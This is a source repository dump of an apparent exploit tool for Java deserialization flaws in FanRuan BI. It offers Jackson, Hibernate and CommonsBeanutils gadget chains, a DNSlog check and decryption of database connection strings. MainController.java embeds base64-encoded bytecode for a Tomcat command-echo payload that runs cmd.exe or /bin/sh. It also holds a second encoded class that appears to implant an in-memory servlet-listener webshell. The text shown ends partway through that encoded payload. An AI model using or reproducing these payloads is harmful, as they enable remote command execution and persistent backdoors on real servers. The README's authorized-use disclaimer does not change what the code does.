Repository: 7wkajk/Frchannel Branch: master Commit: 814f2e84c1ba Files: 15 Total size: 13.4 MB Directory structure: gitextract_zs2x39su/ ├── README.md ├── lib/ │ ├── fine-core-10.0.jar │ └── fine-third-10.0.jar ├── pom.xml └── src/ ├── META-INF/ │ └── MANIFEST.MF └── main/ ├── java/ │ └── com/ │ └── example/ │ └── frchannel/ │ ├── MainApplication.java │ ├── MainController.java │ ├── attack.java │ └── payload/ │ ├── CommonsBeanutils183.java │ ├── Hibernate.java │ ├── JacksonSignedObject.java │ ├── URLDNS.java │ └── utils.java └── resources/ ├── META-INF/ │ └── MANIFEST.MF └── com/ └── example/ └── frchannel/ └── main.fxml ================================================ FILE CONTENTS ================================================ ================================================ FILE: README.md ================================================ # 帆软bi反序列漏洞利用工具 1、新增反序列化利用链 2、新增数据库连接解密功能 3、修复ssl证书问题 ![image](https://github.com/user-attachments/assets/0dc731cf-d3a0-4eda-8276-bfbdf3cea365) ![image](https://github.com/user-attachments/assets/c7f3a1f1-0679-4978-9d98-97af4e546781) 支持jackson、hibernate、cb反序列化链来进行利用 ![image](https://github.com/7wkajk/Frchannel/assets/76613407/b1caba86-2220-4827-9311-6f1b5573a913) ## 工具使用 **dnslog功能** ![image](https://github.com/7wkajk/Frchannel/assets/76613407/cbfa16a5-422c-4f03-9d61-a52c504bee29) ![image](https://github.com/7wkajk/Frchannel/assets/76613407/a3dabd83-4893-4ad6-a4c4-858cde5c3d1e) **命令执行回显** ![image](https://github.com/7wkajk/Frchannel/assets/76613407/35bdd7e3-d21c-46c7-9a9e-a2809988ad7a) ## 免责声明 该工具仅用于安全自查检测 由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。 本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动,不得以任何方式将其用于商业目的。 该工具只授权于企业内部进行问题排查,请勿用于非法用途,请遵守网络安全法,否则后果作者概不负责 如有涉及公司与个人敏感信息,侵权烦请告知,我们会立即删除并致歉。谢谢!所有工具安全性自测!!! ================================================ FILE: lib/fine-third-10.0.jar ================================================ [File too large to display: 13.3 MB] ================================================ FILE: pom.xml ================================================ 4.0.0 com.example FrChannel 1.0-SNAPSHOT FrChannel UTF-8 5.8.1 org.openjfx javafx-controls 13.0.2 javax.servlet javax.servlet-api 3.1.0 org.javassist javassist 3.18.2-GA org.apache.httpcomponents httpclient 4.5.13 org.openjfx javafx-fxml 13.0.2 commons-beanutils commons-beanutils 1.8.3 org.junit.jupiter junit-jupiter-api ${junit.version} test org.junit.jupiter junit-jupiter-engine ${junit.version} test org.apache.maven.plugins maven-compiler-plugin 3.8.1 13 13 org.openjfx javafx-maven-plugin 0.0.8 default-cli com.example.frchannel/com.example.frchannel.HelloApplication app app app true true true ================================================ FILE: src/META-INF/MANIFEST.MF ================================================ Manifest-Version: 1.0 Main-Class: com.example.frchannel.MainApplication ================================================ FILE: src/main/java/com/example/frchannel/MainApplication.java ================================================ package com.example.frchannel; import javafx.application.Application; import javafx.fxml.FXMLLoader; import javafx.scene.Parent; import javafx.scene.Scene; import javafx.stage.Stage; import java.io.IOException; public class MainApplication extends Application { @Override public void start(Stage stage) throws IOException { FXMLLoader fxmlLoader = new FXMLLoader(MainApplication.class.getResource("main.fxml")); Parent page = fxmlLoader.load(MainApplication.class.getResource("main.fxml")); Scene scene = new Scene(page); stage.setTitle("FrChannel v2 by yecp"); stage.setScene(scene); stage.show(); } public static void main(String[] args) { launch(); } } ================================================ FILE: src/main/java/com/example/frchannel/MainController.java ================================================ package com.example.frchannel; import com.example.frchannel.payload.CommonsBeanutils183; import com.example.frchannel.payload.Hibernate; import com.example.frchannel.payload.JacksonSignedObject; import com.example.frchannel.payload.URLDNS; import javafx.collections.FXCollections; import javafx.collections.ObservableList; import javafx.event.ActionEvent; import javafx.fxml.FXML; import javafx.fxml.Initializable; import javafx.geometry.Insets; import javafx.geometry.Pos; import javafx.scene.control.*; import javafx.scene.layout.GridPane; import javafx.scene.layout.HBox; import javafx.stage.Window; import javafx.util.Pair; import org.apache.http.HttpHost; import java.net.URL; import java.util.Base64; import java.util.ResourceBundle; public class MainController implements Initializable { private final String echo = "yv66vgAAADQBFgoAAgCIBwCJCgANAIoHAIsKAA0AjAoABACNCgCOAI8KAI4AkAgAkQoADQCSCgANAJMIAJQHAJUHAGUJABEAlgoADQCXBwCYCgARAJkKAJoAmwgAnAoADQCdBwCeCACfCACgCgBLAKEKAKIAowoAogCkCAClCgBKAKYHAIAKAKIApwgAqAoALwCpCACqCACrBwCsCACtCACuCACvCACwBwCxCwApALILACkAswgAtAgAtQgAtgcAtwgAuAoALwCNCgAvALkKALoAuwoAvAC9CgAvAL4IAL8KAMAAwQoALwDCCADDCADECADFCADGCADHBwDIBwDJCgA/AMoKAD8AywoAzADNCgA+AM4IAM8KAD4A0AoAPgDRCgAvANIKAEoA0woAFgDUBwDVBwDWAQAFZ2V0RlYBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvT2JqZWN0OwEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR2YXI1AQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAAR2YXIwAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEdmFyMQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABHZhcjIBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAEdmFyMwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQANU3RhY2tNYXBUYWJsZQcA1wcAlQcAiwEACkV4Y2VwdGlvbnMBAAl3cml0ZUJvZHkBABcoTGphdmEvbGFuZy9PYmplY3Q7W0IpVgEABHZhcjQBAAR2YXI2AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQACW0IHAIkHAJ4BAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAR0aGlzAQAMTFRvbWNhdEVjaG87AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAY8aW5pdD4BAAMoKVYBAAV2YXIxNQEAAWMBAAV2YXIxMgEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAV2YXIxNAEABXZhcjEwAQAFdmFyMTEBAAR2YXI5AQABSQEABHZhcjgBABBMamF2YS91dGlsL0xpc3Q7AQASTGphdmEvbGFuZy9UaHJlYWQ7AQABWgEAE1tMamF2YS9sYW5nL1RocmVhZDsHANUHANgHALcHALEHAHYBAApTb3VyY2VGaWxlAQAPVG9tY2F0RWNoby5qYXZhDADZANoBABBqYXZhL2xhbmcvT2JqZWN0DADbANwBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24MAN0A2gwAcQDeBwDXDADfAOAMAOEA4gEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwA4wDkDADlAOYBAAhzZXRCeXRlcwEAD2phdmEvbGFuZy9DbGFzcwwA5wBaDADoAOkBABFqYXZhL2xhbmcvSW50ZWdlcgwAcQDqBwDrDADsAO0BAAdkb1dyaXRlDADuAOkBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQATamF2YS5uaW8uQnl0ZUJ1ZmZlcgEABHdyYXAMAHEAcgcA2AwA7wDwDADxAPIBAAd0aHJlYWRzDABMAE0MAPMA9AEABGV4ZWMMAPUA9gEABGh0dHABAAZ0YXJnZXQBABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAAdoYW5kbGVyAQAGZ2xvYmFsAQAKcHJvY2Vzc29ycwEADmphdmEvdXRpbC9MaXN0DAD3APgMAOEA+QEAA3JlcQEAC2dldFJlc3BvbnNlAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEABUV0YWdzDAD6APsHAPwMAP0BAAcBAQwBAgEDDABxAQQBAAdvcy5uYW1lBwEFDAEGAQcMAQgA9AEABndpbmRvdwEAB2NtZC5leGUBAAIvYwEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABxAQkMAQoBCwcBDAwBDQEODABxAQ8BAAJcQQwBEAERDAESAPQMARMBFAwAYABhDAEVAPQBAApUb21jYXRFY2hvAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAQamF2YS9sYW5nL1RocmVhZAEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1nZXRTdXBlcmNsYXNzAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEABFRZUEUBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAQoSSlWAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAHaXNFbXB0eQEAAygpWgEAEGphdmEvdXRpbC9CYXNlNjQBAApnZXREZWNvZGVyAQAHRGVjb2RlcgEADElubmVyQ2xhc3NlcwEAHCgpTGphdmEvdXRpbC9CYXNlNjQkRGVjb2RlcjsBABhqYXZhL3V0aWwvQmFzZTY0JERlY29kZXIBAAZkZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAFKFtCKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEACGdldEJ5dGVzAQAEKClbQgEACmdldE1lc3NhZ2UAIQBKAEsAAAAAAAUACgBMAE0AAgBOAAAA1QADAAUAAAA4AU0qtgABTi0SAqUAFi0rtgADTacADToELbYABU6n/+osxwAMuwAEWSu3AAa/LAS2AAcsKrYACLAAAQANABMAFgAEAAMATwAAADIADAAAAAwAAgAN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"; private final String mem = "yv66vgAAADEBfQEAGWNoL3Fvcy9sb2diYWNrbnMvSlNPTlV0aWwHAAEBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwADAQAMZ2V0Q2xhc3NOYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAARDb2RlAQArY29tLmdvb2dsZS5nc28uU2VydmxldFJlcXVlc3RYZWRyeWlMaXN0ZW5lcggACAEAD2dldEJhc2U2NFN0cmluZwEACkV4Y2VwdGlvbnMBABNqYXZhL2lvL0lPRXhjZXB0aW9uBwAMAQAQamF2YS9sYW5nL1N0cmluZwcADgEL1Eg0c0lBQUFBQUFBQUFKVlhlVnhVMXhYK0xqUHdobUUwY1ZBRVRkT29VV0VZR0VXSkN0bEVRWWhBMUxFb0VwTStaaDd3ZEpnM3pudURZaHZUcGpaSjJ6VGRtNmI3a3BTMnNhMjJjVkNweHRnbGJib3Y2Yjd2VGR2LyswK2FmdmU5eHdERElQYjNtM25MdmVkODU5enZMUGUrRi81NzRSS0E5ZmkzUUczTUdJNE1Hc1pnUW9zTW1rWWtxcVZIRXBxMVJ6dVMwVXhydnhaUGorcWR1bWxwU1MydFFBZ3NPYVNPcUpHRW1oeU1iRXVvcHRscHFIRTU1Ukc0V1U0ZGk1Z09SQjdVRkVpeFFNbXRlbEszYmhmd1ZOZjBDSGkzR1hGTjRMcE9QYWwxWjRiN3RmUmV0VC9Ca1dDbkVWTVRQV3BhbCsvdW9OY2EwazJCdXM3L3cvWG1BQlQ0L1BCaW9jQ3k2czZDaTJpV3ZvaVl3Tkk1NWlYSTlSS2tuSEtENUtLNnI2VW1YN2FaYy8wQ1JYMHRBbVZ4YllCcnNzY0pTL0dPanRrS0FWUmhtWVJkTG5COTJuRi9PLzlwWTFTTEM2eHgzSjJMMk5ZUkxXblpycGVic3ljRVZsMkROcGwyN1hZd0xycWEwSTlMeStWVG5yWWVpMmtwU3plU0NsWnk0UzVtTEQyYXNveklOajAxUkhvRWZHbk5UQmxKazFIS2QzcklzbEtSZGw1eTloMUphaW1tWnBxRUZyaHBiaVZiZ3NJZW8vK1FUQlhidFl5bEp5SmRha3FDdUFzUVdEdXZaVnVRT2l2bVpVWkJuY0RxYThKVEVHR3NybTNSQ3RZTDNIajF0U3JZSUxCZ3hqSVZOSElvYXFteHczeHp5MkhSb0diTjlJUThWdGRjTmVwTXVjM1k0a2M5bWdUOFE1ck03bTUxMks2NHFaaEhyYlNlSEtUc3JiaXRGRVZndlpiU1dMc3Ruc3ZMR2JJMWhkVHZ4Tll5cklPc0I4ZFVqNXJJYUFGc2QyQmJtZlg1V2dwMk1KdGlSdEpTOVNSTFovbU1raDFTMDFHNWtHUk1hNjQ1RUVBSDd2S2pIVHNGS2dhblNHNUxHOE01Um5iUG40OE9NL25FelptM0FYU2gyMC8vN3lhRmRnemNKRjQ1aS94WmFSekFidXlSbkVRWnY2a1F0NnZta0IzbTEvalJnNFUrMURMZlV4bTZ2M242K3UvdVA2VEZyT2JaSXpXemh3TG94WUV5M0lJK0gxYjdzSmJOS2VQRGZleWlLYmFlQUZRbkJteFlQaHF5QThNS0toRFpBdFo2QW9oREs4TkdETkRQcmExUkg0YmNwcEhYR2hTd1pzdElVa2ZTdEZTR1RhQm16dXpKYnlzQkpERHN4MkdRMjFmUEVEQlRXb3laSFV0cjFrNXROTW8zQlNtdWhJWmFSaTJOZWVPdHJ1bHJDU0FOVXlhSTVmVGdBb1o3WkdzZjhlTUlqbEpKYms1U3RNT1JOTFZZSnExYm94RWFzVVZIY1Z6Njg3b1ppZXV3b3VCK3h3RzM1NWRYRityM0QrQU5mcHpBRzluSThpWVZ2RWxnNGFTK3MrOElWTTFHeVcxSmI4WkRmcHpFd3pJVnk1MEszZU5XNkxKSk5kMkl0R1FHQnJTMEZuZm1xUGRXdkUxbTRLTXNtc0l5Q2g2ek83b2FsL3V5d09McWd0WDlUcnpMajNmZzNRS0JmdFhVYnRtNFhZdloyM2xGb1FqTGFMd1g3NVBPdnA5Tk8yNjA2VWsxd1JPQjNFcmw1QWZ3aE9UMmd3RXNRWVVVK3pBeko2a2RuY3FjbVg3azh2eWorSmprNGVQRVlpbXJDVlB1endXeWx2M2lrL2lVcFA5SkZtNXVYNk40TWFscjY1bTMyQXEwdXB3VFkvaU05UG16Ym5kM1pydU5hQ1kyMUtacmlmaTBiZlJwSnRxSW1tNmMzUFhtbG0xMkpOZk43TTZ1VFdkdXZYTnJZS3BNRTBsckF3bktSR3c0VjVLYnlxSUNSNWFsYzJncHlETExTUXlqbWxDWkcvWW9UMS96TlArWnBnTTRoL015T2hlNGY4bGVtVWxwNlZqQzdrQmZrYlZ3RWhmendqV2pNcC8xNHhRdVU5ZlVySzJ4bU95aXpsR3crb0FVdUlLditqR09yN0VMRVR4dlo3cGFiL3dHbnBlSzMyVHM2YzN4NHpJajdleE5UNTV4OGs0LzhnRENneG1UMjh3azY0ZDFNMWJmc2pYYU9wbjBhUisrUjR3Qnc5MU5WOC9EMG1RLytBRitLRG40RVd2SXNlOVVvZzgvY1FxNlM3T0dETEorWndHOHZsbDRoZUxnSU5EVVQvRXphZXJuQXBWelNTbjRKWXRJVDQ0WWg3bUdMUVhJN0x0R2ZuK04zL2p4Sy94V1FhWGJLK3ZsUmxmZllqY0tILzdnYkowNTh2NUV1dzRCUHZ5Rkd0ckdSbTFEdzVZQnJiOHh2cVdoc2QrSHY1SGVZWVBIVEMzbXd6K1lBVWN6UTl6US9va1ZMRHN2cUE4UHI5elcrSVVqNU1uRnZtKzM3ejQrS2ZhMWxHK3QxQkM4THcyTjQ3cFE4TzluRVFzRlh6cUxPMExCZjUxRjJ4bE9GY0hQcTZ4b2lxRUNsU2pqVThCUjQzMkJEYzZQQWhkeUZ5V2xiR1dvZGh5TDU4ZGNUcFFiYk13S1I4L0ZsRStMRUNTcWtHM1FSYitOQzVSU3BhRmFUKzJsY2R4d09nZFhZcnQwMHpTbzBoeFVLWTFVMmxDdndvMHVWS090U2VmUDVFR3NuZ1loY2hEY2VBa3VJVlpNUW9nbnFhRnc3a3B0RnMyWHNhNHJISG9HZDV6SHRpS1cxZE5UTDN4b3k2THpDVHdlQ285alYzZjRQUFlLTkhrbjBOTTdqbjFOeFZYRndmMGN2TWVEZlh3OFdKZDd2TGZLNno1N2c2OGxUT3c4QmowSTZ1ZGdOSlZVbFJSUDRFaXZITTRpRTlUSGNTeUwxMCtncURlVXhZTlpQREtPdDFTVmhBajhkb0VzM3BQRjQxbDhLSXVQWlBHSnF1SXNudG8zaHVLbWtqRjR1OC9JQXhBNzFBUldNVGt1NGpMdkhwdVROa1lCcU9ab0NEV29SUVJoYkVJZFQ3VDEyTW0zSG02Zy9XaUFnUTBZNFRub1VSSjdqaElUUEhCZFJET1J0dUE1eGsxeTJpNVBHR2doNHMxa0xvTEh5UFVhMnRtRWg3Q1dOcnhFdlo5V1FpaVdyT2E0ditKeTc4TUZlaENtcjVzNHVnYmVWMmltUkVHUmdub0Y2eFEwS05pbzBMQlFzT28vRUMyOHlkanlsTXJycDZrankyT1ZIZjUyamtncllkRlZHOXgvRHA4TEh1VGxNaHE2eGxEVlhUdnR6ZGZrSFlPSHYvQnBPN2NYWVRFeGx0Q25sUktlM25MTDQ3aEVmWkdya2FpYlJaZU1RWGRkOE1SVHFLaGpma3dRYVVHVHR5NkxTOTFqcjd3VWZoNkJDWnpxWlpFODkyelltOFhYdzFUNDFtbjZ0d0Rsekw1VEx2OE5aQUVzWG40a2tMMGRuTzNnL0YyVTJNbVU3bVJDZDVHYlhXUjBONk1TcGZ4ZW0rdU45S09TLzgvakMxdzFQY0lYY2RwbWN6UE9NQjc4UENkUlg4S1hlZWUzR0o3QldUc1M0UHE4TDBOUk1LN2daTGVDVTZXQmFkUUplWFJ4Ri9zeWd5Z1hPeHI4L2puOHVDc2NmTkY3RVNkN1BjSDJhQmEvQ0RQTCtINmkxMVBMMTk5ZHh1OXp2OU5kd1Q5U2crejgyVU1OQ2d2ZVQxQ3F5VnRGTGg0TS9uVTZVcFYzTGh5N1h0ZlIrOGxzWFVhWGdBTzg5bkgwSHJKeGtPdTlsenpkWjdOeU8yZEttRU12Y0xWRm5ObHFQM2s0WDRkdmt4OHZOWGFRcysvWTFUK2F5OEJSZk5mbWJKUFRKWTdJeEpvaUJmOERQemJydjA4U0FBQT0IABABAAY8aW5pdD4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMABIAEwoADwAUAQADKClWAQATamF2YS9sYW5nL0V4Y2VwdGlvbgcAFwEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEACGxpc3RlbmVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAHY29udGV4dAEACGNvbnRleHRzAQAQTGphdmEvdXRpbC9MaXN0OwEABHRoaXMBABtMY2gvcW9zL2xvZ2JhY2tucy9KU09OVXRpbDsBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQAkTGphdmEvdXRpbC9MaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQAOamF2YS91dGlsL0xpc3QHACQBABJqYXZhL3V0aWwvSXRlcmF0b3IHACYBAA1TdGFja01hcFRhYmxlDAASABYKAAQAKQEACmdldENvbnRleHQBABIoKUxqYXZhL3V0aWwvTGlzdDsMACsALAoAAgAtAQAIaXRlcmF0b3IBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7DAAvADALACUAMQEAB2hhc05leHQBAAMoKVoMADMANAsAJwA1AQAEbmV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7DAA3ADgLACcAOQEAC2dldExpc3RlbmVyAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMADsAPAoAAgA9AQALYWRkTGlzdGVuZXIBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYMAD8AQAoAAgBBAQAEa2V5MQEACGNoaWxkcmVuAQATTGphdmEvdXRpbC9IYXNoTWFwOwEAA2tleQEAC2NoaWxkcmVuTWFwAQAGdGhyZWFkAQASTGphdmEvbGFuZy9UaHJlYWQ7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAB3RocmVhZHMBABNbTGphdmEvbGFuZy9UaHJlYWQ7BwBNAQAQamF2YS9sYW5nL09iamVjdAcATwEAEGphdmEvbGFuZy9UaHJlYWQHAFEBABFqYXZhL3V0aWwvSGFzaE1hcAcAUwEAE2phdmEvdXRpbC9BcnJheUxpc3QHAFUKAFYAKQEACmdldFRocmVhZHMIAFgBAAxpbnZva2VNZXRob2QBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvT2JqZWN0OwwAWgBbCgACAFwBAAdnZXROYW1lDABeAAYKAFIAXwEAHENvbnRhaW5lckJhY2tncm91bmRQcm9jZXNzb3IIAGEBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgwAYwBkCgAPAGUBAAZ0YXJnZXQIAGcBAAVnZXRGVgwAaQBbCgACAGoBAAZ0aGlzJDAIAGwIAEQBAAZrZXlTZXQBABEoKUxqYXZhL3V0aWwvU2V0OwwAbwBwCgBUAHEBAA1qYXZhL3V0aWwvU2V0BwBzCwB0ADEBAANnZXQMAHYAPAoAVAB3AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7DAB5AHoKAFAAewEAD2phdmEvbGFuZy9DbGFzcwcAfQoAfgBfAQAPU3RhbmRhcmRDb250ZXh0CACAAQADYWRkAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaDACCAIMLACUAhAEAFVRvbWNhdEVtYmVkZGVkQ29udGV4dAgAhgEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsMAIgAiQoAUgCKAQAIdG9TdHJpbmcMAIwABgoAfgCNAQAZUGFyYWxsZWxXZWJhcHBDbGFzc0xvYWRlcggAjwEAH1RvbWNhdEVtYmVkZGVkV2ViYXBwQ2xhc3NMb2FkZXIIAJEBAAlyZXNvdXJjZXMIAJMIAB0BABpqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbgcAlgEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgwAEgCYCgCXAJkBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2V